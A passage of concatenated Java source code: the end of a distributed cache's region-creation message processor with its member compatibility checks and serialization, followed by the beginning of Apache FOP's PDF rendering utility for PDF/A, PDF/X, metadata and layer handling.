rgn.getDistributionAdvisor(); return advisor.adviseGeneric(); } } protected CreateRegionMessage getCreateRegionMessage(Set recps, ReplyProcessor21 proc, boolean useMcast) { CreateRegionMessage msg = new CreateRegionMessage(); msg.regionPath = newRegion.getFullPath(); msg.profile = (CacheProfile) newRegion.getProfile(); msg.processorId = proc.getProcessorId(); msg.concurrencyChecksEnabled = newRegion.getAttributes().getConcurrencyChecksEnabled(); msg.setMulticast(useMcast); msg.setRecipients(recps); return msg; } @Override public void setOnline(InternalDistributedMember target) { // nothing } class CreateRegionReplyProcessor extends ReplyProcessor21 { CreateRegionReplyProcessor(Set members) { super((InternalDistributedSystem) newRegion.getCache() .getDistributedSystem(), members); } private final Map<DistributedMember, Map<ThreadIdentifier, EventSequenceNumberHolder>> remoteEventStates = new ConcurrentHashMap<>(); private boolean allMembersSkippedChecks = true; public Map<ThreadIdentifier, EventSequenceNumberHolder> getEventState( InternalDistributedMember provider) { return remoteEventStates.get(provider); } /** * true if all members skipped CreateRegionMessage#checkCompatibility(), in which case * CreateRegionMessage should be retried. */ public boolean needRetry() { return allMembersSkippedChecks; } @SuppressWarnings("unchecked") @Override public void process(DistributionMessage msg) { Assert.assertTrue(msg instanceof CreateRegionReplyMessage, "CreateRegionProcessor is unable to process message of type " + msg.getClass()); CreateRegionReplyMessage reply = (CreateRegionReplyMessage) msg; LocalRegion lr = (LocalRegion) newRegion; if (logger.isDebugEnabled()) { logger.debug("CreateRegionProcessor processing {}", msg); } try { if (reply.profile != null) { if (newRegion instanceof DistributedRegion) { DistributedRegion dr = (DistributedRegion) newRegion; if (!dr.getDataPolicy().withPersistence() && reply.profile.isPersistent) { dr.setGeneratedVersionTag(false); } } if (CreateRegionMessage.isLocalAccessor(newRegion) && reply.profile.isPersistent) { lr.enableConcurrencyChecks(); } CacheDistributionAdvisor cda = newRegion.getCacheDistributionAdvisor(); cda.putProfile(reply.profile); if (reply.bucketProfiles != null) { RegionAdvisor ra = (RegionAdvisor) cda; ra.putBucketRegionProfiles(reply.bucketProfiles); } // Save all event states, need to initiate the event tracker from the GII provider if (reply.eventState != null) { remoteEventStates.put(reply.getSender(), (Map<ThreadIdentifier, EventSequenceNumberHolder>) reply.eventState); } if (lr.isUsedForPartitionedRegionBucket()) { ((BucketRegion) lr).updateEventSeqNum(reply.seqKeyForWan); } // Process any delta filter-profile messages received during profile // exchange. // The pending messages are queued in the local profile. FilterProfile remoteFP = reply.profile.filterProfile; if (remoteFP != null) { FilterProfile localFP = ((LocalRegion) newRegion).filterProfile; // localFP can be null and remoteFP not null when upgrading from 7.0.1.14 to 7.0.1.15 if (localFP != null) { List messages = localFP.getQueuedFilterProfileMsgs(reply.getSender()); // Thread init level is set since region is used during CQ registration. final InitializationLevel oldLevel = LocalRegion.setThreadInitLevelRequirement(ANY_INIT); try { remoteFP.processQueuedFilterProfileMsgs(messages); } finally { LocalRegion.setThreadInitLevelRequirement(oldLevel); localFP.removeQueuedFilterProfileMsgs(reply.getSender()); } } } } if (reply.destroyedId != null && newRegion instanceof DistributedRegion) { DistributedRegion dr = (DistributedRegion) newRegion; dr.getPersistenceAdvisor().removeMember(reply.destroyedId); } if (!reply.skippedCompatibilityChecks) { allMembersSkippedChecks = false; } } finally { // invoke super.process() even in case of exceptions (bug #41556) if (logger.isDebugEnabled()) { logger.debug("CreateRegionProcessor invoking super.process()"); } super.process(msg); } } /** * IllegalStateException is an anticipated reply exception. Receiving multiple replies with this * exception is normal. */ @Override protected boolean logMultipleExceptions() { return false; } } public static class CreateRegionMessage extends HighPriorityDistributionMessage implements MessageWithReply { public boolean concurrencyChecksEnabled; protected String regionPath; protected CacheProfile profile; protected int processorId; private transient boolean incompatible = false; private transient ReplyException replyException; private transient CacheProfile replyProfile; private transient ArrayList replyBucketProfiles; private transient Object eventState; protected transient boolean severeAlertCompatible; private transient boolean skippedCompatibilityChecks; @Override public int getProcessorId() { return processorId; } @Override public boolean isSevereAlertCompatible() { return severeAlertCompatible; } @Override public boolean sendViaUDP() { return true; } @Override protected void process(ClusterDistributionManager dm) { // Set thread local flag to allow entrance through initialization Latch final InitializationLevel oldLevel = LocalRegion.setThreadInitLevelRequirement(ANY_INIT); LocalRegion lclRgn = null; PersistentMemberID destroyedId = null; try { // get the region from the path, but do NOT wait on initialization, // otherwise we could have a distributed deadlock InternalCache cache = dm.getExistingCache(); // Fix for bug 42051 - Discover any regions that are in the process // of being destroyed DistributedRegion destroyingRegion = cache.getRegionInDestroy(regionPath); if (destroyingRegion != null) { destroyedId = destroyingRegion.getPersistentID(); } lclRgn = (LocalRegion) cache.getRegion(regionPath); if (lclRgn instanceof CacheDistributionAdvisee) { // bug 37604 - don't return a profile if this is a bucket and the owner // has been locally destroyed if (lclRgn.isUsedForPartitionedRegionBucket()) { if (!((BucketRegion) lclRgn).isPartitionedRegionOpen()) { if (logger.isDebugEnabled()) { logger.debug("<Partitioned Region Closed or Locally Destroyed> {}", this); } return; } } handleCacheDistributionAdvisee((CacheDistributionAdvisee) lclRgn, true); } else { if (lclRgn == null) { // check to see if a ProxyBucketRegion (not a true region) exists handleCacheDistributionAdvisee( PartitionedRegionHelper.getProxyBucketRegion(cache, regionPath), false); } else { if (logger.isDebugEnabled()) { logger.debug("<lclRgn scope is not distributed. Scope={}> {}", lclRgn.getAttributes().getScope(), this); } } } } catch (PRLocallyDestroyedException ignore) { if (logger.isDebugEnabled()) { logger.debug("<Region Locally Destroyed> {}", this); } } catch (RegionDestroyedException ignore) { if (logger.isDebugEnabled()) { logger.debug("<RegionDestroyed> {}", this); } } catch (CancelException ignore) { if (logger.isDebugEnabled()) { logger.debug("<CancelException> {}", this); } } catch (VirtualMachineError err) { SystemFailure.initiateFailure(err); // If this ever returns, rethrow the error. We're poisoned // now, so don't let this thread continue. throw err; } catch (Throwable t) { // Whenever you catch Error or Throwable, you must also // catch VirtualMachineError (see above). However, there is // _still_ a possibility that you are dealing with a cascading // error condition, so you also need to check to see if the JVM // is still usable: SystemFailure.checkFailure(); if (replyException == null) { replyException = new ReplyException(t); } else { logger.warn(String.format("More than one exception thrown in %s", this), t); } } finally { LocalRegion.setThreadInitLevelRequirement(oldLevel); CreateRegionReplyMessage replyMsg = new CreateRegionReplyMessage(); replyMsg.profile = replyProfile; replyMsg.bucketProfiles = replyBucketProfiles; replyMsg.eventState = eventState; replyMsg.destroyedId = destroyedId; replyMsg.setProcessorId(processorId); replyMsg.setSender(dm.getId()); // for EventStateHelper.dataSerialize replyMsg.setRecipient(getSender()); replyMsg.skippedCompatibilityChecks = skippedCompatibilityChecks; if (lclRgn != null && lclRgn.isUsedForPartitionedRegionBucket()) { replyMsg.seqKeyForWan = ((BucketRegion) lclRgn).getEventSeqNum().get(); } if (replyException != null && !incompatible) { // no need to log the exception if it was caused by compatibility check if (logger.isDebugEnabled()) { logger.debug("While processing '{}', got exception, returning to sender", this, replyException); } } replyMsg.setException(replyException); dm.putOutgoing(replyMsg); if (lclRgn instanceof PartitionedRegion) { ((PartitionedRegion) lclRgn).sendIndexCreationMsg(getSender()); } } } /** * Attempts to process this message with the specified <code>CacheDistributionAdvisee</code>. * * @param cda the CacheDistributionAdvisee to apply this profile to * @param isRealRegion true if CacheDistributionAdvisee is a real region */ private void handleCacheDistributionAdvisee(CacheDistributionAdvisee cda, boolean isRealRegion) { if (cda == null) { // local region or proxy bucket region not found if (logger.isDebugEnabled()) { logger.debug("<lclRgn is null> {}", this); // matches old logging } return; } String errorMsg = null; if (isRealRegion) { // only check compatibility if this advisee is a real region errorMsg = checkCompatibility(cda, profile); } if (errorMsg != null) { incompatible = true; if (logger.isDebugEnabled()) { logger.debug("{} <replyProfile not set because errorMsg={}", this, errorMsg); } replyException = new ReplyException(new IllegalStateException(errorMsg)); } else { if (isRealRegion) { // TODO do we need this if clause?? // if the new member is persistent, turn on concurrency checks // fixes bug 45208 if (isLocalAccessor(cda) && profile.isPersistent) { // #45934 need to set the generateVersionTag flag if (cda instanceof DistributedRegion) { DistributedRegion dr = (DistributedRegion) cda; if (!dr.getDataPolicy().withPersistence()) { dr.setGeneratedVersionTag(false); } } assert cda instanceof LocalRegion; LocalRegion lr = (LocalRegion) cda; lr.enableConcurrencyChecks(); } } // #45934 don't add profile until the attributes are set correctly, // in particular enableConcurrencyChecks and generateVersionTag cda.getDistributionAdvisor().putProfile(profile); if (isRealRegion) { // only exchange profile if this advisee is a real region replyProfile = (CacheProfile) cda.getProfile(); if (cda instanceof PartitionedRegion) { // partitioned region needs to also answer back all real bucket profiles PartitionedRegion pr = (PartitionedRegion) cda; replyBucketProfiles = pr.getRegionAdvisor().getBucketRegionProfiles(); } else if (((LocalRegion) cda).isUsedForPartitionedRegionBucket()) { eventState = ((LocalRegion) cda).getEventState(); } } } } protected String checkCompatibility(CacheDistributionAdvisee rgn, CacheProfile profile) { Scope otherScope = rgn.getAttributes().getScope(); String result = null; // Verify both VMs are gateway-enabled or neither are. Note that since // this string is sent back to the caller, the 'other' and the 'my' // below are from the caller's point of view. final DistributedMember myId = rgn.getDistributionManager().getId(); boolean otherCCEnabled = rgn.getAttributes().getConcurrencyChecksEnabled(); boolean skipCheckForAccessor = skipCheckForAccessor(rgn, profile); boolean skipConcurrencyChecks = skipChecksForInternalRegion(rgn); boolean initializing = skipDuringInitialization(rgn); if (initializing) { skippedCompatibilityChecks = true; } if (!initializing && !skipCheckForAccessor && (rgn.getAttributes().getDataPolicy() .withPersistence() != profile.dataPolicy.withPersistence())) { // 45186: Do not allow a persistent replicate to be started if a // non-persistent replicate is running if (!rgn.getAttributes().getDataPolicy().withPersistence()) { result = String.format( "Cannot create region %s DataPolicy withPersistence=true because another cache (%s) has the same region DataPolicy withPersistence=false. Persistent members must be started before non-persistent members", regionPath, myId); skipConcurrencyChecks = true; } else { // make the new member turn on concurrency checks skipConcurrencyChecks = true; } } if (!initializing && !skipCheckForAccessor && !skipConcurrencyChecks && concurrencyChecksEnabled != otherCCEnabled) { result = String.format( "Cannot create region %s concurrency-checks-enabled=%s because another cache (%s) has the same region concurrency-checks-enabled=%s", regionPath, concurrencyChecksEnabled, myId, otherCCEnabled); } Set<String> otherGatewaySenderIds = ((LocalRegion) rgn).getGatewaySenderIds(); Set<String> myGatewaySenderIds = profile.gatewaySenderIds; if (!otherGatewaySenderIds.equals(myGatewaySenderIds)) { if (!rgn.getFullPath().contains(DynamicRegionFactory.DYNAMIC_REGION_LIST_NAME)) { result = String.format( "Cannot create Region %s with %s gateway sender ids because another cache has the same region defined with %s gateway sender ids", regionPath, myGatewaySenderIds, otherGatewaySenderIds); } } Set<String> otherAsynEventQueueIds = ((LocalRegion) rgn).getVisibleAsyncEventQueueIds(); Set<String> myAsyncEventQueueIds = profile.asyncEventQueueIds; if (!isLocalOrRemoteAccessor(rgn, profile) && !otherAsynEventQueueIds.equals(myAsyncEventQueueIds)) { result = String.format( "Cannot create Region %s with %s async event ids because another cache has the same region defined with %s async event ids", regionPath, myAsyncEventQueueIds, otherAsynEventQueueIds); } final PartitionAttributes pa = rgn.getAttributes().getPartitionAttributes(); if (pa == null && profile.isPartitioned) { result = String.format( "Cannot create PartitionedRegion %s because another cache (%s) has the same region defined as a non PartitionedRegion.", regionPath, myId); } else if (pa != null && !profile.isPartitioned) { result = String.format( "Cannot create the non PartitionedRegion %s because another cache (%s) has a Partitioned Region defined with the same name.", regionPath, myId); } else if (profile.scope.isDistributed() && otherScope.isDistributed()) { // This check is somewhat unnecessary as all Partitioned Regions should have the same scope // due to the fact that Partitioned Regions do no support scope. if (profile.scope != otherScope) { result = String.format( "Cannot create region %s with %s scope because another cache (%s) has same region with %s scope.", regionPath, profile.scope, myId, otherScope); } } final boolean otherIsOffHeap = rgn.getAttributes().getOffHeap(); boolean thisIsRemoteAccessor = !rgn.getAttributes().getDataPolicy().withStorage() || (pa != null && pa.getLocalMaxMemory() == 0); if (!isRemoteAccessor(profile) && !thisIsRemoteAccessor && profile.isOffHeap != otherIsOffHeap) { result = String.format( "Cannot create region %s with off-heap=%s because another cache (%s) has the same region with off-heap=%s.", regionPath, profile.isOffHeap, myId, otherIsOffHeap); } String cspResult = null; Map<String, CacheServiceProfile> myProfiles = ((LocalRegion) rgn).getCacheServiceProfiles(); // Iterate and compare the remote CacheServiceProfiles to the local ones for (CacheServiceProfile remoteProfile : profile.cacheServiceProfiles) { CacheServiceProfile localProfile = myProfiles.get(remoteProfile.getId()); if (localProfile == null) { cspResult = getMissingProfileMessage(remoteProfile, true); } else { cspResult = remoteProfile.checkCompatibility(rgn.getFullPath(), localProfile); } if (cspResult != null) { break; } } // If the comparison result is null, compare the local profiles to the remote ones. If there // are more local profiles than remote ones (meaning there are ones defined locally that are // not defined remotely), then compare those. This should produce an informative error message // (as opposed to returning something like 'the profiles don't match'). if (cspResult == null) { if (myProfiles.size() > profile.cacheServiceProfiles.size()) { for (CacheServiceProfile localProfile : myProfiles.values()) { if (!profile.cacheServiceProfiles.stream() .anyMatch(remoteProfile -> remoteProfile.getId().equals(localProfile.getId()))) { cspResult = getMissingProfileMessage(localProfile, false); break; } } } } // If the comparison result is not null, set the final result. // Note: Be careful not to overwrite the final result with null in case it has already been // set in a previous compatibility check. if (cspResult != null) { result = cspResult; } if (logger.isDebugEnabled()) { logger.debug("CreateRegionProcessor.checkCompatibility: this={}; other={}; result={}", rgn, profile, result); } return result; } protected String getMissingProfileMessage(CacheServiceProfile profile, boolean existsInThisMember) { return profile.getMissingProfileMessage(existsInThisMember); } /** * When many members are started concurrently, it is possible that an accessor or non-version * generating replicate receives CreateRegionMessage before it is initialized, thus preventing * persistent members from starting. We skip compatibilityChecks if the region is not * initialized, and let other members check compatibility. If all members skipCompatabilit * checks, then the CreateRegionMessage should be retried. fixes #45186 */ private boolean skipDuringInitialization(CacheDistributionAdvisee rgn) { boolean skip = false; if (rgn instanceof LocalRegion) { LocalRegion lr = (LocalRegion) rgn; if (!lr.isInitialized()) { Set recipients = new CreateRegionProcessor(rgn).getRecipients(); recipients.remove(getSender()); if (!recipients.isEmpty()) { skip = true; } } } return skip; } /** * For internal regions skip concurrency-checks-enabled checks, since we will set it to true * after profile exchange if required. */ private boolean skipChecksForInternalRegion(CacheDistributionAdvisee rgn) { boolean skip = false; if (rgn instanceof LocalRegion) { LocalRegion lr = (LocalRegion) rgn; skip = lr.isInternalRegion(); } return skip; } /** * check for isLocalOrRemoteAccessor(CacheDistributionAdvisee, CacheProfile) and check if * DistributedRegion does not generate entry versions. */ private boolean skipCheckForAccessor(CacheDistributionAdvisee rgn, CacheProfile profile) { boolean skip = false; if (rgn instanceof DistributedRegion) { DistributedRegion dr = (DistributedRegion) rgn; skip = !dr.getGenerateVersionTag(); } return skip || isLocalOrRemoteAccessor(rgn, profile); } /** * @return true if profile being exchanged or region is an accessor i.e has no storage */ protected static boolean isLocalOrRemoteAccessor(CacheDistributionAdvisee region, CacheProfile profile) { return isLocalAccessor(region) || isRemoteAccessor(profile); } protected static boolean isLocalAccessor(CacheDistributionAdvisee region) { if (!region.getAttributes().getDataPolicy().withStorage()) { return true; } return region.getAttributes().getPartitionAttributes() != null && region.getAttributes().getPartitionAttributes().getLocalMaxMemory() == 0; } protected static boolean isRemoteAccessor(CacheProfile profile) { if (!profile.dataPolicy.withStorage()) { return true; } if (profile.isPartitioned) { PartitionProfile prProfile = (PartitionProfile) profile; return prProfile.localMaxMemory == 0; } return false; } @Override public void reset() { super.reset(); regionPath = null; profile = null; processorId = -1; } @Override public void fromData(DataInput in, DeserializationContext context) throws IOException, ClassNotFoundException { super.fromData(in, context); regionPath = DataSerializer.readString(in); profile = DataSerializer.readObject(in); processorId = in.readInt(); concurrencyChecksEnabled = in.readBoolean(); } @Override public int getDSFID() { return CREATE_REGION_MESSAGE; } @Override public void toData(DataOutput out, SerializationContext context) throws IOException { super.toData(out, context); DataSerializer.writeString(regionPath, out); DataSerializer.writeObject(profile, out); out.writeInt(processorId); out.writeBoolean(concurrencyChecksEnabled); } @Override public String toString() { return "CreateRegionMessage (region='" + regionPath + "'; processorId=" + processorId + "; concurrencyChecksEnabled=" + concurrencyChecksEnabled + "; profile=" + profile + ")"; } } public static class CreateRegionReplyMessage extends ReplyMessage { protected CacheProfile profile; protected ArrayList bucketProfiles; protected Object eventState; /** * Added to fix 42051. If the region is in the middle of being destroyed, return the destroyed * profile */ protected PersistentMemberID destroyedId; protected boolean skippedCompatibilityChecks; long seqKeyForWan = -1; @Override public int getDSFID() { return CREATE_REGION_REPLY_MESSAGE; } @Override public boolean sendViaUDP() { return true; } @Override public void fromData(DataInput in, DeserializationContext context) throws IOException, ClassNotFoundException { super.fromData(in, context); if (in.readBoolean()) { profile = DataSerializer.readObject(in); } int size = in.readInt(); if (size == 0) { bucketProfiles = null; } else { bucketProfiles = new ArrayList(size); for (int i = 0; i < size; i++) { RegionAdvisor.BucketProfileAndId bp = new RegionAdvisor.BucketProfileAndId(); InternalDataSerializer.invokeFromData(bp, in); bucketProfiles.add(bp); } } if (in.readBoolean()) { eventState = EventStateHelper.deDataSerialize(in, false); } if (in.readBoolean()) { destroyedId = new PersistentMemberID(); InternalDataSerializer.invokeFromData(destroyedId, in); } skippedCompatibilityChecks = in.readBoolean(); seqKeyForWan = in.readLong(); } @Override public void toData(DataOutput out, SerializationContext context) throws IOException { super.toData(out, context); out.writeBoolean(profile != null); if (profile != null) { DataSerializer.writeObject(profile, out); } if (bucketProfiles == null) { out.writeInt(0); } else { int size = bucketProfiles.size(); out.writeInt(size); for (Object bucketProfile : bucketProfiles) { RegionAdvisor.BucketProfileAndId bp = (RegionAdvisor.BucketProfileAndId) bucketProfile; InternalDataSerializer.invokeToData(bp, out); } } if (eventState != null) { out.writeBoolean(true); // The isHARegion flag is false here because // we currently only include the event state in the profile // for bucket regions. EventStateHelper.dataSerialize(out, (Map) eventState, false, getSender()); } else { out.writeBoolean(false); } if (destroyedId != null) { out.writeBoolean(true); InternalDataSerializer.invokeToData(destroyedId, out); } else { out.writeBoolean(false); } out.writeBoolean(skippedCompatibilityChecks); out.writeLong(seqKeyForWan); } @Override public String toString() { StringBuilder buff = new StringBuilder(); buff.append("CreateRegionReplyMessage"); buff.append("(sender=").append(getSender()); buff.append("; processorId="); buff.append(super.processorId); buff.append("; profile="); buff.append(profile); if (bucketProfiles != null) { buff.append("; bucketProfiles="); buff.append(bucketProfiles); } if (eventState != null) { buff.append("; eventState=<not null>"); } buff.append("; skippedCompatibilityChecks="); buff.append(skippedCompatibilityChecks); buff.append("; seqKeyForWan="); buff.append(seqKeyForWan); if (getException() != null) { buff.append("; with exception {").append(getException().getMessage()).append("}"); } buff.append(")"); return buff.toString(); } } }
apache/xmlgraphics-fop
36,120
fop-core/src/main/java/org/apache/fop/render/pdf/PDFRenderingUtil.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* $Id$ */ package org.apache.fop.render.pdf; import java.awt.color.ICC_Profile; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.URI; import java.net.URISyntaxException; import java.util.ArrayList; import java.util.Date; import java.util.EnumMap; import java.util.List; import java.util.Map; import java.util.TimeZone; import org.apache.commons.io.IOUtils; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.apache.xmlgraphics.java2d.color.profile.ColorProfileUtil; import org.apache.xmlgraphics.util.DateFormatUtil; import org.apache.xmlgraphics.xmp.Metadata; import org.apache.xmlgraphics.xmp.schemas.DublinCoreSchema; import org.apache.xmlgraphics.xmp.schemas.XMPBasicAdapter; import org.apache.xmlgraphics.xmp.schemas.XMPBasicSchema; import org.apache.fop.accessibility.Accessibility; import org.apache.fop.apps.FOUserAgent; import org.apache.fop.apps.io.InternalResourceResolver; import org.apache.fop.fo.extensions.ExtensionAttachment; import org.apache.fop.fo.extensions.xmp.XMPMetadata; import org.apache.fop.pdf.PDFAMode; import org.apache.fop.pdf.PDFArray; import org.apache.fop.pdf.PDFConformanceException; import org.apache.fop.pdf.PDFDictionary; import org.apache.fop.pdf.PDFDocument; import org.apache.fop.pdf.PDFEmbeddedFile; import org.apache.fop.pdf.PDFEmbeddedFiles; import org.apache.fop.pdf.PDFEncryptionManager; import org.apache.fop.pdf.PDFEncryptionParams; import org.apache.fop.pdf.PDFFileSpec; import org.apache.fop.pdf.PDFICCBasedColorSpace; import org.apache.fop.pdf.PDFICCStream; import org.apache.fop.pdf.PDFInfo; import org.apache.fop.pdf.PDFLayer; import org.apache.fop.pdf.PDFMetadata; import org.apache.fop.pdf.PDFName; import org.apache.fop.pdf.PDFNames; import org.apache.fop.pdf.PDFNavigator; import org.apache.fop.pdf.PDFNull; import org.apache.fop.pdf.PDFNumber; import org.apache.fop.pdf.PDFOutputIntent; import org.apache.fop.pdf.PDFPage; import org.apache.fop.pdf.PDFPageLabels; import org.apache.fop.pdf.PDFReference; import org.apache.fop.pdf.PDFSetOCGStateAction; import org.apache.fop.pdf.PDFSignParams; import org.apache.fop.pdf.PDFTransitionAction; import org.apache.fop.pdf.PDFXMode; import org.apache.fop.pdf.Version; import org.apache.fop.pdf.VersionController; import org.apache.fop.render.pdf.extensions.PDFActionExtension; import org.apache.fop.render.pdf.extensions.PDFArrayExtension; import org.apache.fop.render.pdf.extensions.PDFCollectionEntryExtension; import org.apache.fop.render.pdf.extensions.PDFDictionaryAttachment; import org.apache.fop.render.pdf.extensions.PDFDictionaryExtension; import org.apache.fop.render.pdf.extensions.PDFDictionaryType; import org.apache.fop.render.pdf.extensions.PDFEmbeddedFileAttachment; import org.apache.fop.render.pdf.extensions.PDFObjectType; import org.apache.fop.render.pdf.extensions.PDFPageExtension; import org.apache.fop.render.pdf.extensions.PDFReferenceExtension; import static org.apache.fop.render.pdf.PDFEncryptionOption.ENCRYPTION_PARAMS; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_ACCESSCONTENT; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_ANNOTATIONS; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_ASSEMBLEDOC; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_COPY_CONTENT; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_EDIT_CONTENT; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_FILLINFORMS; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_PRINT; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_PRINTHQ; import static org.apache.fop.render.pdf.PDFEncryptionOption.OWNER_PASSWORD; import static org.apache.fop.render.pdf.PDFEncryptionOption.USER_PASSWORD; /** * Utility class which enables all sorts of features that are not directly connected to the * normal rendering process. */ class PDFRenderingUtil { /** logging instance */ private static Log log = LogFactory.getLog(PDFRenderingUtil.class); private FOUserAgent userAgent; /** the PDF Document being created */ private PDFDocument pdfDoc; private PDFRendererOptionsConfig rendererConfig; /** the ICC stream used as output profile by this document for PDF/A and PDF/X functionality. */ private PDFICCStream outputProfile; /** the default sRGB color space. */ private PDFICCBasedColorSpace sRGBColorSpace; PDFRenderingUtil(FOUserAgent userAgent) { this.userAgent = userAgent; initialize(); } private void initialize() { rendererConfig = PDFRendererOptionsConfig.DEFAULT.merge(createFromUserAgent(userAgent)); if (rendererConfig.getPDFAMode().isLevelA()) { // PDF/A Level A requires tagged PDF userAgent.getRendererOptions().put(Accessibility.ACCESSIBILITY, Boolean.TRUE); } } protected static PDFRendererOptionsConfig createFromUserAgent(FOUserAgent userAgent) { Map<PDFRendererOption, Object> properties = new EnumMap<PDFRendererOption, Object>(PDFRendererOption.class); for (PDFRendererOption option : PDFRendererOption.values()) { Object value = userAgent.getRendererOption(option); properties.put(option, option.parse(value)); } PDFEncryptionParams encryptionConfig = new EncryptionParamsBuilder().createParams(userAgent); return new PDFRendererOptionsConfig(properties, encryptionConfig); } void mergeRendererOptionsConfig(PDFRendererOptionsConfig config) { rendererConfig = rendererConfig.merge(config); } private void updateInfo() { PDFInfo info = pdfDoc.getInfo(); info.setCreator(userAgent.getCreator()); info.setCreationDate(userAgent.getCreationDate()); info.setAuthor(userAgent.getAuthor()); info.setTitle(userAgent.getTitle()); info.setSubject(userAgent.getSubject()); info.setKeywords(userAgent.getKeywords()); } private void updatePDFProfiles() { pdfDoc.getProfile().setPDFAMode(rendererConfig.getPDFAMode()); pdfDoc.getProfile().setPDFUAMode(rendererConfig.getPDFUAMode()); userAgent.setPdfUAEnabled(pdfDoc.getProfile().getPDFUAMode().isEnabled()); pdfDoc.getProfile().setPDFXMode(rendererConfig.getPDFXMode()); pdfDoc.getProfile().setPDFVTMode(rendererConfig.getPDFVTMode()); } private void addsRGBColorSpace() throws IOException { if (rendererConfig.getDisableSRGBColorSpace()) { if (rendererConfig.getPDFAMode() != PDFAMode.DISABLED || rendererConfig.getPDFXMode() != PDFXMode.DISABLED || rendererConfig.getOutputProfileURI() != null) { throw new IllegalStateException("It is not possible to disable the sRGB color" + " space if PDF/A or PDF/X functionality is enabled or an" + " output profile is set!"); } } else { if (this.sRGBColorSpace != null) { return; } //Map sRGB as default RGB profile for DeviceRGB this.sRGBColorSpace = PDFICCBasedColorSpace.setupsRGBAsDefaultRGBColorSpace(pdfDoc); } } private void addDefaultOutputProfile() throws IOException { if (this.outputProfile != null) { return; } ICC_Profile profile; InputStream in = null; URI outputProfileUri = rendererConfig.getOutputProfileURI(); if (outputProfileUri != null) { this.outputProfile = pdfDoc.getFactory().makePDFICCStream(); in = userAgent.getResourceResolver().getResource(rendererConfig.getOutputProfileURI()); try { profile = ColorProfileUtil.getICC_Profile(in); } finally { IOUtils.closeQuietly(in); } this.outputProfile.setColorSpace(profile, null); } else { //Fall back to sRGB profile outputProfile = sRGBColorSpace.getICCStream(); } } /** * Adds an OutputIntent to the PDF as mandated by PDF/A-1 when uncalibrated color spaces * are used (which is true if we use DeviceRGB to represent sRGB colors). * @throws IOException in case of an I/O problem */ private void addPDFA1OutputIntent() throws IOException { addDefaultOutputProfile(); String desc = ColorProfileUtil.getICCProfileDescription(this.outputProfile.getICCProfile()); PDFOutputIntent outputIntent = pdfDoc.getFactory().makeOutputIntent(); outputIntent.setSubtype(PDFOutputIntent.GTS_PDFA1); outputIntent.setDestOutputProfile(this.outputProfile); outputIntent.setOutputConditionIdentifier(desc); outputIntent.setInfo(outputIntent.getOutputConditionIdentifier()); pdfDoc.getRoot().addOutputIntent(outputIntent); } /** * Adds an OutputIntent to the PDF as mandated by PDF/X when uncalibrated color spaces * are used (which is true if we use DeviceRGB to represent sRGB colors). * @throws IOException in case of an I/O problem */ private void addPDFXOutputIntent() throws IOException { addDefaultOutputProfile(); String desc = ColorProfileUtil.getICCProfileDescription(this.outputProfile.getICCProfile()); int deviceClass = this.outputProfile.getICCProfile().getProfileClass(); if (deviceClass != ICC_Profile.CLASS_OUTPUT) { throw new PDFConformanceException(pdfDoc.getProfile().getPDFXMode() + " requires that" + " the DestOutputProfile be an Output Device Profile. " + desc + " does not match that requirement."); } PDFOutputIntent outputIntent = pdfDoc.getFactory().makeOutputIntent(); outputIntent.setSubtype(PDFOutputIntent.GTS_PDFX); outputIntent.setDestOutputProfile(this.outputProfile); outputIntent.setOutputConditionIdentifier(desc); outputIntent.setInfo(outputIntent.getOutputConditionIdentifier()); pdfDoc.getRoot().addOutputIntent(outputIntent); } public void renderXMPMetadata(XMPMetadata metadata) { Metadata docXMP = metadata.getMetadata(); Metadata fopXMP = PDFMetadata.createXMPFromPDFDocument(pdfDoc); //Merge FOP's own metadata into the one from the XSL-FO document List<Class> exclude = new ArrayList<Class>(); if (pdfDoc.getProfile().getPDFAMode().isPart1()) { exclude.add(DublinCoreSchema.class); } fopXMP.mergeInto(docXMP, exclude); XMPBasicAdapter xmpBasic = XMPBasicSchema.getAdapter(docXMP); //Metadata was changed so update metadata date xmpBasic.setMetadataDate(new java.util.Date()); PDFMetadata.updateInfoFromMetadata(docXMP, pdfDoc.getInfo()); PDFMetadata pdfMetadata = pdfDoc.getFactory().makeMetadata( docXMP, metadata.isReadOnly()); pdfDoc.getRoot().setMetadata(pdfMetadata); } public void generateDefaultXMPMetadata() { if (pdfDoc.getRoot().getMetadata() == null) { //If at this time no XMP metadata for the overall document has been set, create it //from the PDFInfo object. Metadata xmp = PDFMetadata.createXMPFromPDFDocument(pdfDoc); PDFMetadata pdfMetadata = pdfDoc.getFactory().makeMetadata( xmp, true); pdfDoc.getRoot().setMetadata(pdfMetadata); } } public void renderDictionaryExtension(PDFDictionaryAttachment attachment, PDFPage currentPage) { PDFDictionaryExtension extension = attachment.getExtension(); PDFDictionaryType type = extension.getDictionaryType(); if (type == PDFDictionaryType.Action) { addNavigatorAction(extension); } else if (type == PDFDictionaryType.Layer) { addLayer(extension); } else if (type == PDFDictionaryType.Navigator) { addNavigator(extension); } else { renderDictionaryExtension(extension, currentPage); } } public void addLayer(PDFDictionaryExtension extension) { assert extension.getDictionaryType() == PDFDictionaryType.Layer; String id = extension.getProperty(PDFDictionaryExtension.PROPERTY_ID); if ((id != null) && (id.length() > 0)) { PDFLayer layer = pdfDoc.getFactory().makeLayer(id); layer.setResolver(new PDFLayer.Resolver(layer, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object name = extension.findEntryValue("Name"); Object intent = extension.findEntryValue("Intent"); Object usage = 